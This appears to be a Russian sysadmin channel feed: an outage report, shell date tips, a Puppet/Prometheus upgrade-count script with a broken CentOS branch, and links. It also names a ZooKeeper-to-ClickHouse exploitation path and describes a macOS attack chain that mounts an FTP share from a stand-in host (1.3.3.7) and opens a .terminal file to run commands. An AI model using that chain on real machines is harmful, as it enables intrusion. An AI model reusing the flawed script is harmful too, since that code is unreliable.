Ошибка при настройке BGP привела к 27-минутному сбою в работе Cloudflare

Компания Cloudflare, предоставляющая сеть доставки контента для 27 млн интернет-ресурсов и обслуживающая трафик 13% из 1000 крупнейших сайтов, раскрыла подробности инцидента, в результате которого в течение 27 минут была нарушена работа многих сегментов сети, в том числе отвечающих за доставку трафика в Лондон, Чикаго, Лос-Анджелес, Вашингтон, Амстердам, Париж, Москву и Санкт-Петербург. Проблема была вызвана неверным изменением конфигурации на маршрутизаторе в Атланте. Во время инцидента, который произошёл 17 июля с 21:12 по 21:39 (UTC), общий объём трафика в сети Cloudflare снизился примерно на 50%.

источник

дата в таймштамп и наоборот

timestamp -> human-readable
date -d @1339471282

human-readable -> timestamp
date --date="Tue 21 Jul 2020 03:56:50 PM MS" +"%s"

snippet erb-скрипта подсчета числа обновлений для prometheus.

### MANAGED BY PUPPET
#!/bin/sh

prom_file="/var/prometheus/textfile_exporter/available_upgrades.prom"
current_id="$$"
updates="0"
echo '# HELP available_upgrades Number of available upgrades' >> "${prom_file}${current_id}"
echo '# TYPE available_upgrades gauge' >> "${prom_file}${current_id}"

<% if @facts['os']['name'] == "Debian" or @facts['os']['name'] == "Ubuntu" -%>
updates=$(apt list --upgradeable | grep -v 'Listing' | wc -l)
<% elsif @facts['os']['name'] == "CentOS" or @facts['os']['name'] == "RedHat" -%>
fuck_centos=$(yum list updates)
if echo ${fuck_centos}|grep -q 'Available Upgrades'; then
  updates=$($fuck_centos | awk '/Available Upgrades/{x=NR};{y=NR} END{printf y-x}')
fi
<% end -%>
echo "available_upgrades ${updates}" >> "${prom_file}${current_id}"
mv "${prom_file}${current_id}" "${prom_file}"

#puppet #prometheus

З.Ы. если кто ткнет носом как сделать поиск для центоси проще - тому большой лайк.

Проблемы взаимодействия одминов и программеров

Небольшой ролик о том как в додо пицца коллектив перестал бороться друг с другом и попытались улучшить производительность команд решая проблемы взаимодействия

https://www.youtube.com/watch?v=OWSebmnuhBw

Для тех кто не в теме, они решили выкачать некоторое количество репозиториев, записать на пленку и поместить в хранилище и заморозить на долгие-долгие годы

https://github.blog/2020-07-16-github-archive-program-the-journey-of-the-worlds-open-source-code-to-the-arctic/

При сканировании сети доступен порт tcp/2181? Скорее всего это ZooKeeper - распределенное иерархическое key-value хранилище. Он часто используется для отказоустойчивого хранения конфигураций и сериализованых объектов. Пример эксплуатации уязвимости в ClickHouse через ZooKeeper.

Лол, через расширение файла .terminal можно ломать маки даже в 2020.

Я использовал эту технику в своем ресерче по хаку Yota на ZN2015, там был вектор, который позволял мне выполнять на системе open() с произвольным URL. Эксплуатировалось в два действия - сначала делаем open('ftp://1.3.3.7/...), ос маунтит шару в /Volumes (сейчас уже не так), а потом делаем open('file:///Volumes/shara/.../pwn.terminal'), открывая .terminal файл, который уже выполнял любые команды.

Так вот. Тут все намного проще.
https://medium.com/@metnew/exploiting-popular-macos-apps-with-a-single-terminal-file-f6c2efdfedaa

дождались приема фикса отображения kubegraf в 7 графане. пуллимся)

https://github.com/grafana/grafana-plugin-repository/pull/677

Напоминаю, тем кому интересно и не очень, что через час вебинар у хашикорпов - релиз нового terraform

https://www.hashicorp.com/webinars/improved-workflows-with-terraform/

Немного фана вам в ленту

https://onlinetestpad.com/f4lork2o3vi2m

Удивительно, но до сих пор никто не решил мой кроссворд полностью. Сейчас отображение правильных ответов в конце выключил. Напоминаю что заполняется только английскими буквами и никаких жаргонизмов.

hashicorp/terraform tagged: v0.13.0
Link: https://github.com/hashicorp/terraform/releases/tag/v0.13.0
Release notes:

## 0.13.0 (August 10, 2020)

> This is a list of changes relative to Terraform v0.12.29. To see the  
> 
> incremental changelogs for the v0.13.0 prereleases, see  
> 
> [the v0.13.0-rc1 changelog](https://github.com/hashicorp/terraform/blob/v0.13.0-...

More